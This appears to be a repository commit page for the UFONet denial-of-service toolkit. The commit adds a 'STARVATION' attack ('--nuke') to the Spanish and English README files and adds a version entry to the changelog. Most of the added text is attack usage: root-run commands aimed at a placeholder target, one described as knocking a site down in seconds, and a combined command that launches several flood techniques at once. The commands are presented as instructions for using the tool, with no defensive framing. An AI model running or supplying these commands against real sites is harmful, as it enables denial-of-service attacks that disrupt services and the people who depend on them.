소스 검색

Added STARVATION to Docs

psy 6 년 전
부모
커밋
4f47032e37
2개의 변경된 파일19개의 추가작업 그리고 2개의 파일을 삭제
  1. 9 1
      docs/LEEME.txt
  2. 10 1
      docs/README.txt

+ 9 - 1
docs/LEEME.txt

@@ -364,11 +364,15 @@ O un ataque XMAS ('root' requerido) que inundará tu objetivo con paquetes 'Árb
 
      sudo python ufonet -a http://target.com --xmas 101
 
+Un ataque STARVATION ('root' requerido) que tumbará tu objetivo en segundos, si éste no tiene un mínimo nivel de protección:
+
+     sudo python ufonet -a http://target.com --nuke 10000
+
 Todos los ataques pueden ser combinados haciendo que UFONet utilice distintas técnicas de DDoS y DoS, al mismo tiempo:
 
      python ufonet -a http://target.com --loic 100 --loris 100
 
-     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101
+     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101 --nuke 10000
 
 ###############################
 # Actualizando
@@ -433,6 +437,10 @@ más algunas "extra":
 # Timelog
 ###############################
 
+--------------------------
+03.02.2019 : v.1.2.1
+--------------------------
+
 --------------------------
 31.12.2018 : v.1.2
 --------------------------

+ 10 - 1
docs/README.txt

@@ -359,11 +359,16 @@ Or a XMAS ('root' required) attack that will flood your target with 'Christmas T
 
      sudo python ufonet -a http://target.com --xmas 101
 
+A STARVATION attack ('root' required) that will knock down your target in seconds, if it does not have a 
+minimum level of protection:
+
+     sudo python ufonet -a http://target.com --nuke 10000
+
 All ways could be combined, so UFONet can attack DDoS and DoS, at the same time:
 
      python ufonet -a http://target.com --loic 100 --loris 100
 
-     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101
+     sudo python ufonet -a http://target.com --loic 100 --loris 100 --ufosyn 100 --spray 100 --smurf 101 --xmas 101 --nuke 10000
 
 ###############################
 # Updating
@@ -427,6 +432,10 @@ This will open a tab on your default browser with all features of the tool and s
 # Timelog
 ###############################
 
+--------------------------
+03.02.2019 : v.1.2.1
+--------------------------
+
 --------------------------
 31.12.2018 : v.1.2
 --------------------------